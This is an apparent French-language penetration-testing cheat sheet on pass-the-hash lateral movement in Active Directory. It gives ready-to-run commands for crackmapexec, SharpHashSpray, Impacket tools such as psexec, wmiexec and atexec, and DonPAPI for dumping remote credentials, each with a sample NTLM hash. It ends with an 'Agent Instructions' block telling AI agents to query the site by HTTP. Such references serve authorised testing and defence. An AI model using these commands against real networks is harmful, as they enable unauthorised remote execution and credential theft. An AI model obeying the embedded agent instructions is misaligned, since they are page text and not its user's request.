# Pass The Hash

## SharpHashSpray

Un outil compatible avec l'assemblage d'exécution pour tester les hachages d'administration locale sur un domaine Active Directory.

Exemple d'utilisation:

*`$ SharpHashSpray.exe Administrator <hash>`*

ressource: <https://github.com/RedCursorSecurityConsulting/SharpHashSpray>

## SMB

### Crackmapexec

```bash
crackmapexec smb <target IP> -u '<username>' -H '<hash>'
```

## Impacket

### Psexec

#### psexec.py

```bash
python psexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### WMI

#### wmiexec.py

```
python wmiexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### RPC

#### rpcdump.py

```
python rpcdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP>
```

### Exécution de commandes à distance

#### atexec.py

```
python atexec.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <username>@<target IP> whoami
```

#### Lookupsid.py

```
python lookupsid.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

#### Samrdump.py

```
python samrdump.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

#### reg.py

```
python reg.py -hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP> -keyName <key>
```

## DonPAPI

DonPAPI permet de dumper les identifiants sur une machine à distance (LSA, DPAPI, SAM, WIFI, Vaults, Chromes secrets, Mozilla secrets, mRemoteNG secrets, mots de passe VNC et autres).

Exemple d'utilisation:

```
$ DonPAPI.py --hashes 00000000000000000000000000000000:32196B56FFE6F45E294117B91A83BF38 <domain>/<username>@<target IP>
```

Ressource: <https://github.com/login-securite/DonPAPI>

## PTH Toolkit

En 2012, un tas de scripts pass-the-hash ont été introduits lors de la conférence BlackHat USA cette année-là. Ils étaient disponibles sur Google Code Archive. En raison de leur convivialité et de leur popularité, Kali Linux les a présentés à la version 2013. Ils ont inclus les scripts suivants dans leur pth-toolkit.

* **pth-curl**
* **pth-rpcclient**
* **pth-smbget**
* **pth-winexe**
* **pth-wmic**
* **pth-net**
* **pth-smbclient**
* **pth-sqsh**
* **pth-wmic**


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.s1rn3tz.ovh/pentest-ad/mouvements-lateraux/pass-the-hash.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.